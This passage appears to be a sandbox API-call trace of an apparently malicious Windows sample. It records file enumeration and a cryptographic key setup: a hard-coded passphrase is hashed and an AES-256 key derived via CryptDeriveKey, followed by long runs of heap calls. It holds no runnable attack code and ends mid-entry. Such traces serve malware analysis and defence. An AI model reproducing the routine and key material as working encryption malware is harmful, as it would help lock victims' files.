dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="Zjnf2x96GL5i.rtf", cAlternateFileName="ZJNF2X~1.RTF")) returned 0x41ac740 [0082.176] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0082.177] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.177] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.177] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0082.177] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.177] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0082.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0082.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0082.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0082.177] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a48c0) returned 1 [0082.178] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0082.178] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.178] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0082.178] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.178] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.178] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.178] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.178] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.178] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0082.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cb3f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0082.178] CryptCreateHash (in: hProv=0x41a48c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0082.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0082.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0082.178] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0082.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0082.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0082.179] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0082.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43c3698, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0082.179] CryptHashData (hHash=0x41ac780, pbData=0x17e2668, dwDataLen=0x22, dwFlags=0x1) returned 1 [0082.179] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.179] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0082.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43c3698, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0082.179] CryptDeriveKey (in: hProv=0x41a48c0, Algid=0x6610, hBaseData=0x41ac780, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac000) returned 1 [0082.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0082.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0082.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0082.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0082.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0082.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0082.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0082.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0082.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0082.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3890 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3968 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3890 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b30 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3ae8 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38a8 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b80 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cf0 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0082.180] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0082.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c60 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ba0 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3758 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3770 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3680 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c35f0 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3728 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3638 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3800 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36e0 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c37a0 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c37b8 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3830 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3590 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c36c8 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c37d0 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3740 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3710 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0082.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35c0 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0082.182] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3650 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0082.182] PeekMessageW (in: lpMsg=0x144e1ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e1ac) returned 0 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35d8 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c90 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3848 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3608 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b90 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b48 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c39e0 [0082.182] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3ad0 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c39b0 [0082.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38c0 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3950 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b18 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0082.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796f08 [0082.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0082.183] CryptDestroyHash (hHash=0x41ac780) returned 1 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b78 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a28 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3938 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0082.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3938 | out: hHeap=0x1780000) returned 1 [0082.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0082.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a28 | out: hHeap=0x1780000) returned 1 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3ae8 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3938 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3aa0 [0082.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0082.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3aa0 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3938 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c39e0 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b48 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b78 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3ae8 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0082.185] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0082.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0082.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0082.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0082.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0082.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0082.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0082.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0082.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: 